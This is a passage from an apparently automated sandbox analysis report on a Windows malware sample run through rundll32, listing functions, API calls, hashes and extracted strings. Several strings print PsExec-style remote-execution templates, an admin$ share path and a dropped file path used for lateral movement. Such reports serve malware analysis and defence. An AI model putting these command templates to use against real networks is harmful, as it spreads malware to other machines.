                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02E56DC7
                                                • HeapFree.KERNEL32(00000000), ref: 02E56DCA
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E56DD1
                                                • HeapFree.KERNEL32(00000000), ref: 02E56DD4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$AllocFreememcpy
                                                • String ID: \\%ws\admin$\%ws
                                                • API String ID: 3405790324-2640736851
                                                • Opcode ID: c4154b0bd360b78e90f34a1ab09c9cb831d371530ff14d4b5f250428d6e38431
                                                • Instruction ID: 2cb54c013905975b56c790c759767278883df88b0b1a8857085d34dc330597db
                                                • Opcode Fuzzy Hash: c4154b0bd360b78e90f34a1ab09c9cb831d371530ff14d4b5f250428d6e38431
                                                • Instruction Fuzzy Hash: 6831B17591011AAFCB00EFA9CC45EAF7BB9EF48344F458855ED04CB251EB70EA14CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E597A5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E58B70: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,?,?,02E59A11), ref: 02E58B80
                                                • SetLastError.KERNEL32(00000003,?,00000001,75BF73E0,?,02E59BEB,?), ref: 02E59821
                                                • PathFileExistsW.SHLWAPI(?,?,02E59BEB,?), ref: 02E5982C
                                                • wsprintfW.USER32 ref: 02E59846
                                                • wsprintfW.USER32 ref: 02E5985A
                                                • memcpy.MSVCRT ref: 02E59889
                                                Strings
                                                • z, xrefs: 02E5980E
                                                • %s \\%s -accepteula -s , xrefs: 02E59840
                                                • -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 , xrefs: 02E59854
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FilePathwsprintf$ErrorExistsFindLastNamememcpy
                                                • String ID: %s \\%s -accepteula -s $-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 $z
                                                • API String ID: 374144278-3863528809
                                                • Opcode ID: 450bbcdab3799ca5580851961b8132f849c1ca579855226106011a9e87a66110
                                                • Instruction ID: 678ca21941c50f0d87b12ecc7c389778b22ae11f1ba90b0b5be669e386bd79e2
                                                • Opcode Fuzzy Hash: 450bbcdab3799ca5580851961b8132f849c1ca579855226106011a9e87a66110
                                                • Instruction Fuzzy Hash: 1231C872AA0224DBCB20DF64DC44AEE73B9AF54344F0495A6E806D7211EB78D681CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56DE0 Relevance: 12.6, APIs: 10, Instructions: 97memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 02E56E15
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56E1E
                                                • memcpy.MSVCRT ref: 02E56E4B
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02E56E6F
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56E72
                                                • memcpy.MSVCRT ref: 02E56EA1
                                                • GetProcessHeap.KERNEL32(00000000,?,02CD5F60,?,?), ref: 02E56EC1
                                                • HeapFree.KERNEL32(00000000), ref: 02E56EC4
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E56ECB
                                                • HeapFree.KERNEL32(00000000), ref: 02E56ECE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$AllocFreememcpy
                                                • String ID:
                                                • API String ID: 3405790324-0
                                                • Opcode ID: 8384f52ebd7b9405d9f4726a11a60b74c3232973d9f716e572090011a129bfd1
                                                • Instruction ID: 8cd6d32b48e0b1cbd9cf9e606bf8b019fd2a416ffbe2031e765dda818dd6480b
                                                • Opcode Fuzzy Hash: 8384f52ebd7b9405d9f4726a11a60b74c3232973d9f716e572090011a129bfd1
                                                • Instruction Fuzzy Hash: 7D318D7594011AABCB14AFA9CC09EAFBBB9EF58344F458455ED04DB260EB30E714CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E512D5 Relevance: 10.6, APIs: 7, Instructions: 70fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 02E512FB
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 02E51312
                                                • GetLastError.KERNEL32 ref: 02E5131F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorFileLastmemset
                                                • String ID:
                                                • API String ID: 80761035-0
                                                • Opcode ID: 9a549f2bf4fc5880e28f2259bf99e889924dac95412a1c4e3c21a702eb56208e
                                                • Instruction ID: eb7af6fc1ac1b85630e6333f17ba04949807d2f67a3f5c54f37e9360464cd4b4
                                                • Opcode Fuzzy Hash: 9a549f2bf4fc5880e28f2259bf99e889924dac95412a1c4e3c21a702eb56208e
                                                • Instruction Fuzzy Hash: FD11A771AE0234BBEB201A62DC58FAB3E5CDF067A0F109534FD09D9080D625C950C6F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57003 Relevance: 10.1, APIs: 8, Instructions: 61memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705B
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705E
                                                • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706B
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706E
                                                • GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57080
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57083
                                                • GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57088
                                                • HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5708B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: da09a5c2ab54389adf6056ebdaddd238114d6a2d8be1134184aad033a9f622b3
                                                • Instruction ID: 1b2a55fb74fa6874402ed7bd851c1b53b9f4ad880e75489d6677381f6ac06e3e
                                                • Opcode Fuzzy Hash: da09a5c2ab54389adf6056ebdaddd238114d6a2d8be1134184aad033a9f622b3
                                                • Instruction Fuzzy Hash: 62111631650718EFDB24EFA6C994F6AB3F9EF49749F110458E9019B2A1CB70ED50CA60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E59EC7 Relevance: 9.1, APIs: 6, Instructions: 76threadsynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,74DF0F00,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E5712E
                                                  • Part of subcall function 02E5711F: HeapAlloc.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57131
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57156
                                                  • Part of subcall function 02E5711F: HeapFree.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57159
                                                • CreateThread.KERNEL32(00000000,00000000,02E59EA4,?,00000004,00000000), ref: 02E59F19
                                                • SetThreadToken.ADVAPI32(?,?), ref: 02E59F2B
                                                • ResumeThread.KERNEL32(?), ref: 02E59F38
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02E59F48
                                                • GetLastError.KERNEL32 ref: 02E59F50
                                                • CloseHandle.KERNEL32(?), ref: 02E59F59
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                • String ID:
                                                • API String ID: 298440786-0
                                                • Opcode ID: d666027191faa2178077195ca548657aeae9d62caeb9574947a95af4c58eddea
                                                • Instruction ID: 167785aa90bfbb82be3027b42d5e0155d7c144597d6d00a9320ad309bd291588
                                                • Opcode Fuzzy Hash: d666027191faa2178077195ca548657aeae9d62caeb9574947a95af4c58eddea
                                                • Instruction Fuzzy Hash: 93216071D90228FFDF009FA6CD848EEB7B9EF08254B109465EA11E3151D7309E44CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56BB0 Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • wsprintfW.USER32 ref: 02E56BD3
                                                • EnterCriticalSection.KERNEL32(02E6F124,00000000,00000114,74DF0F00), ref: 02E56BFE
                                                • StrCatW.SHLWAPI(?,?), ref: 02E56C4C
                                                • StrCatW.SHLWAPI(?,02E6B110), ref: 02E56C52
                                                • SetLastError.KERNEL32(0000007A), ref: 02E56C5A
                                                • LeaveCriticalSection.KERNEL32(02E6F124), ref: 02E56C65
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                • String ID:
                                                • API String ID: 230659905-0
                                                • Opcode ID: 156367b499d4983d1c4e4463efbbbab2466fbf9e4d757400832f6bcc80473e1d
                                                • Instruction ID: 48688875185a6376b30ee779c9392ba43b5fd418c69d8910c62b416aedf4da8b
                                                • Opcode Fuzzy Hash: 156367b499d4983d1c4e4463efbbbab2466fbf9e4d757400832f6bcc80473e1d
                                                • Instruction Fuzzy Hash: 2A112631AD02249BDB246B98DC4DFEA3368FF44394F809961F846DB150EBB0A994CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51384 Relevance: 9.1, APIs: 6, Instructions: 64fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000,000001BE,?,00000000,?,?,02E51852,00000000,00000000), ref: 02E513AD
                                                • GetLastError.KERNEL32(?,?,02E51852,00000000,00000000), ref: 02E513BA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: 5b17cc29e9fd6e636fd4371af5633195b6a754b4d20cb40df60eae97e45e6aa4
                                                • Instruction ID: a0963640cb60835899acdb485c9ca483f4354f7b814be0ffac1b104fb475d2b8
                                                • Opcode Fuzzy Hash: 5b17cc29e9fd6e636fd4371af5633195b6a754b4d20cb40df60eae97e45e6aa4
                                                • Instruction Fuzzy Hash: 8111C8716E0225BBE7201A369D48F6B3AADEBC57A4F21A934F919DA080D734C990C670
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51F74 Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memcpy$Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 3823808316-0
                                                • Opcode ID: d764997a9ced905e42e9c8088c6af0d62b6e18cf1b1fcd26bf13544af6d11445
                                                • Instruction ID: 256d127cc97276ef6dc611882e116c5486b03e64eb8bb560f0c863e99c28c7e4
                                                • Opcode Fuzzy Hash: d764997a9ced905e42e9c8088c6af0d62b6e18cf1b1fcd26bf13544af6d11445
                                                • Instruction Fuzzy Hash: FE2182B1651219ABDF009F65DC48AFA37AAEF45308F05A034FD08CB246D739D856DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56AF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,74DF0F00,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E5712E
                                                  • Part of subcall function 02E5711F: HeapAlloc.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57131
                                                  • Part of subcall function 02E5711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57156
                                                  • Part of subcall function 02E5711F: HeapFree.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57159
                                                • wsprintfW.USER32 ref: 02E56B36
                                                • StrCatW.SHLWAPI(02E6B110,?), ref: 02E56B6E
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E56B90
                                                • HeapFree.KERNEL32(00000000), ref: 02E56B97
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$Free$Allocwsprintf
                                                • String ID: "%ws:%ws"
                                                • API String ID: 3251196674-3918452308
                                                • Opcode ID: c5ba2bf1f457bb2aaf7af7ada2d8e7b6050c6f1d2bde394dfbe0b8653ac27b5f
                                                • Instruction ID: 44c9417d2532e6415f4adda9ab09a833564d4fa60610f3f3cc10793c659cfd88
                                                • Opcode Fuzzy Hash: c5ba2bf1f457bb2aaf7af7ada2d8e7b6050c6f1d2bde394dfbe0b8653ac27b5f
                                                • Instruction Fuzzy Hash: 3C11A235DE0219AFDB00DFA5DD49AAA73FCEB04354F4058A5E901D7110EB709A948B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58320 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,00000000,?,02E57DC9,?), ref: 02E5832B
                                                • PathCombineW.SHLWAPI(02E57DC9,C:\Windows\,00000000,?,02E57DC9,?), ref: 02E5833A
                                                • PathFindExtensionW.SHLWAPI(02E57DC9,?,02E57DC9,?), ref: 02E58347
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Path$Find$CombineExtensionFileName
                                                • String ID: C:\Windows\$C:\Windows\dllcm.dat
                                                • API String ID: 1635495013-2371566056
                                                • Opcode ID: ad74f0c0e8aff9d3c34d846565dc61406e18ad1c08511a0e2b269aa7f8ceefbd
                                                • Instruction ID: eadf14c27d0a4186932800e707c7e7f9b250621994594e97f07ca9614710dc25
                                                • Opcode Fuzzy Hash: ad74f0c0e8aff9d3c34d846565dc61406e18ad1c08511a0e2b269aa7f8ceefbd
                                                • Instruction Fuzzy Hash: 70E08C313E0334ABAB151AA6EC0896A7F5CEF44BD53449422FD0AC1010DB60C8A1C7E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56A2B Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                • CommandLineToArgvW.SHELL32(?,?,?,00000000,?,?,02E57E71,?), ref: 02E56A61
                                                • StrToIntW.SHLWAPI(00000000,?,?,00000000,?,?,02E57E71,?), ref: 02E56A75
                                                • StrStrW.SHLWAPI(00000000,02E63FF0,?,?,00000000,?,?,02E57E71,?), ref: 02E56A95
                                                • StrChrW.SHLWAPI(00000000,0000003A,?,?,00000000,?,?,02E57E71,?), ref: 02E56AA2
                                                • LocalFree.KERNEL32(00000000,?,00000000,?,?,02E57E71,?), ref: 02E56ACF
                                                  • Part of subcall function 02E569A2: CommandLineToArgvW.SHELL32(-00000004,?,00000000,00000001,?,?,?,02E56ACD,?,?,00000000,?,?,02E57E71,?), ref: 02E569D8
                                                  • Part of subcall function 02E569A2: LocalFree.KERNEL32(00000000,?,?,?,02E56ACD,?,?,00000000,?,?,02E57E71,?), ref: 02E56A1E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ArgvCommandFreeLineLocal
                                                • String ID:
                                                • API String ID: 1203019955-0
                                                • Opcode ID: 08ccd683eda61dd905b929e3376c1e86939e5349858b430e69d6b5fff3c4d471
                                                • Instruction ID: ccee2c6a4f2a94b0b724ff0dfcfd3ef3281a1487ec92e9e65a4b750254dc8acd
                                                • Opcode Fuzzy Hash: 08ccd683eda61dd905b929e3376c1e86939e5349858b430e69d6b5fff3c4d471
                                                • Instruction Fuzzy Hash: 0621F0349E0224EFDB229F24D9899BE73BCFB44388B94E814F80297101E73099D0CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57091 Relevance: 6.3, APIs: 5, Instructions: 43memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570A1
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570AA
                                                • InitializeCriticalSection.KERNEL32(00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570B3
                                                • GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570DE
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E570E1
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705B
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5705E
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706B
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5706E
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57080
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57083
                                                  • Part of subcall function 02E57003: GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57088
                                                  • Part of subcall function 02E57003: HeapFree.KERNEL32(00000000,?,?,02E570EF,?,?,?,02E57E38,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5708B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
